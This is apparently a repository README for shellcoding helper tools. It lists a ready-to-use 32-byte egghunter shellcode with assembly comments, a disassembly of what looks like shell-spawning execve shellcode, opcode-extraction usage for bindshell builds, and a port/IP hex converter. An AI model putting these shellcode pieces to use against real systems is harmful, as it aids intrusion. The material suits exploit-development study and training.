Skip to content

Latest commit

 

History

History

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 
 
 

Tools

  • egghunter.py
$ egghunter.py --egg GOOD
[+] Egghunter length: 32 bytes
egghunter = (
	"\x66\x81\xca\xff\x0f"          # or	dx, 0xfff
	"\x42"                          # inc	edx
	"\x52"                          # push	edx
	"\x6a\x02"                      # push	2
	"\x58"                          # pop	eax
	"\xcd\x2e"                      # int	0x2e
	"\x3c\x05"                      # cmp	al, 5
	"\x5a"                          # pop	edx
	"\x74\xef"                      # je	0x1000
	"\xb8\x44\x4f\x4f\x47"          # mov	eax, 0x474f4f44
	"\x8b\xfa"                      # mov	edi, edx
	"\xaf"                          # scasd	eax, dword ptr es:[edi]
	"\x75\xea"                      # jne	0x1005
	"\xaf"                          # scasd	eax, dword ptr es:[edi]
	"\x75\xe7"                      # jne	0x1005
	"\xff\xe7"                      # jmp	edi
)
  • disassemble.py
$ disassemble.py x86 32
len = 27
0x1000:	xor	eax, eax
0x1002:	dec	eax
0x1003:	mov	ebx, 0x91969dd1
0x1008:	ror	byte ptr [edi + edx*4 - 0x2408b701], 1
0x100f:	push	ebx
0x1010:	push	esp
0x1011:	pop	edi
0x1012:	cdq	
0x1013:	push	edx
0x1014:	push	edi
0x1015:	push	esp
0x1016:	pop	esi
0x1017:	mov	al, 0x3b
0x1019:	syscall	
  • bin2op.py
usage: bin2op.py [-h] -f FILE [-s {short,large}] [-p]

Extract the opcode from the objdump of a binary

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  The assembly code filename
  -s {short,large}, --syntax {short,large}
                        Show [less|verbose] version of opcode
  -p, --python          Format output to python syntax

Example: ./bin2op.py -f bindshell/build/bindshell.o -s large
         ./bin2op.py -f bindshell/build/bindshell.o -s large -p
         ./bin2op.py -f bindshell/build/bindshell.o -p
  • port-converter.py
$ port-converter.py 127.11.11.1 8888
[+] Port in dec:        8888
[+] Port in hex:        0xb822
[+] IP address:         127.11.11.1
[+] IP address in hex:  0x010b0b7f